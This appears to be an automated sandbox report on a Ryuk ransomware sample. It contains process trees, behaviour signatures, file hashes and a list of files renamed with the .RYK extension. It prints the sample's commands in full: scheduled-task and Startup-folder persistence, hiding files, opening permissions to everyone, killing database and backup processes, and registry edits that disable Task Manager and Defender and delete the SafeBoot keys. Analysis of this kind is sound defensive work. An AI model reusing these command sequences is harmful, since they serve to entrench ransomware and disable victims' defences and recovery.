PID 2536 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2536 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2536 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2660 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2804 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2804 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2804 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2660 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2528 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2528 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2660 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2492 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2492 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2492 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2660 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2428 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2428 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2660 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2416 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2416 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2416 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2660 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 1080 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1080 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1080 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1992 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1992 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2644 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

N/A

Files

C:\ProgramData\ryuk.exe

MD5 ecd9d8ef99eb9813fa4eced549ea4d88
SHA1 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 ecd9d8ef99eb9813fa4eced549ea4d88
SHA1 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 ecd9d8ef99eb9813fa4eced549ea4d88
SHA1 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 4fd17a6fe54d7ef1d007d3bab3ff5fce
SHA1 4b76934d7e6214db44d83777899bd69db3294435
SHA256 402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
SHA512 bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 87266b0a2f17c202002a02cdf7a14feb
SHA1 c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256 a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

C:\ProgramData\hrmlog1

MD5 87266b0a2f17c202002a02cdf7a14feb
SHA1 c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256 a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

C:\ProgramData\hrmlog1

MD5 87266b0a2f17c202002a02cdf7a14feb
SHA1 c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256 a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

C:\ProgramData\hrmlog2

MD5 4fd17a6fe54d7ef1d007d3bab3ff5fce
SHA1 4b76934d7e6214db44d83777899bd69db3294435
SHA256 402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
SHA512 bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

C:\ProgramData\RYUKID

MD5 609261b3d4e430ff93b8c8cdca7be429
SHA1 cd2be2be6cab95914147dd192c288b5e43f95d2b
SHA256 b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3
SHA512 4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

C:\ProgramData\hrmlog2

MD5 4fd17a6fe54d7ef1d007d3bab3ff5fce
SHA1 4b76934d7e6214db44d83777899bd69db3294435
SHA256 402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
SHA512 bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 609261b3d4e430ff93b8c8cdca7be429
SHA1 cd2be2be6cab95914147dd192c288b5e43f95d2b
SHA256 b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3
SHA512 4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

C:\ProgramData\hrmlog1

MD5 87266b0a2f17c202002a02cdf7a14feb
SHA1 c26e1d9d95c6c77383925af484e5fa1bff6b42bb
SHA256 a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
SHA512 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

C:\ProgramData\RyukReadMe.txt

MD5 82ea3d2f6fc005352ce69909570def3d
SHA1 a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA256 56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512 197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

MD5 2d581d7f41be876ce36523d0a7f2a64a
SHA1 279f1b7f8936ab44e75bec3695d68569d8bbca9e
SHA256 53c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd
SHA512 4caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

MD5 82ea3d2f6fc005352ce69909570def3d
SHA1 a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA256 56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512 197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-19 14:04

Reported

2023-07-19 14:07

Platform

win10v2004-20230703-en

Max time kernel

137s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"

Signatures

Ryuk

ransomware ryuk

Renames multiple (60) files with added filename extension

ransomware

Renames multiple (7863) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xsl.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8ES.LEX.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-pl.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_COL.HXT.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ms.pak.DATA.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core.xml.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ul-oob.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\PersonaSpy.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
